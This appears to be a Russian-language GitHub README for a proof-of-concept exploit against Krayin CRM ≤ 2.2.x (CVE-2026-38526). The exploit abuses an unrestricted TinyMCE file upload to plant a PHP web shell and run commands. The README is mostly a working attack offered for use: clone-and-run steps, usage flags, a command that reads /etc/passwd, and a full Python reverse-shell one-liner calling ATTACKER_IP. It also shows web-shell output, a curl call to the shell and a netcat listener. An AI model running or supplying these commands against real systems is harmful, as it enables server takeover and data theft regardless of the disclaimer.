
Автоматический эксплойт для Krayin CRM ≤ 2.2.x.
Автоматический эксплойт для Krayin CRM ≤ 2.2.x. Этот скрипт использует уязвимость неограниченной загрузки файлов в конечной точке TinyMCE (/admin/tinymce/upload), обходит проверку MIME-типа, подделывая image/jpeg, загружает PHP-веб-шелл и выполняет произвольные команды с привилегиями веб-сервера.
| Property | Value |
|---|
| CVE ID | CVE-2026-38526 |
| Affected Software | Krayin CRM ≤ 2.2.x |
| Vulnerability Type | Неограниченная загрузка файлов → удаленное выполнение кода |
| Authentication | Требуется (любая действительная учетная запись администратора) |
| Endpoint | POST /admin/tinymce/upload |
requestsgit clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]
| Flag | Description | Example |
|---|---|---|
-i | Целевой URL (с http:// или без) | http://target.com или target.com |
-u | Электронная почта/имя пользователя администратора | [email protected] |
-p | Пароль администратора | AdminPassword123! |
-c | Команда для выполнения (по умолчанию: id) | whoami |
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"
# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"
# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"
/admin/tinymce/upload с поддельным MIME-типом[*] Target: http://target.com
[*] Username: [email protected]
[*] Authenticating...
[+] Authentication successful
[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution
[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────
[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'
Ошибка аутентификации: Убедитесь, что учетные данные верны и учетная запись существует на целевом сервере.
Ошибка извлечения CSRF-токена: Убедитесь, что на целевом сервере работает уязвимая версия Krayin CRM и конечная точка входа доступна.
Обратная оболочка не подключается: Убедитесь, что ваш слушатель запущен (nc -lvnp <PORT>), правила брандмауэра разрешают исходящие подключения, а IP/порт в полезной нагрузке указаны верно.
Этот инструмент предоставляется строго для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам незаконен. Пользователи несут единоличную ответственность за получение надлежащего разрешения перед тестированием любой целевой системы. Автор не несет ответственности за неправомерное использование или ущерб, причиненный этим инструментом.
b0nyo - Реализация PoC
TREXNEGRO - Обнаружение уязвимости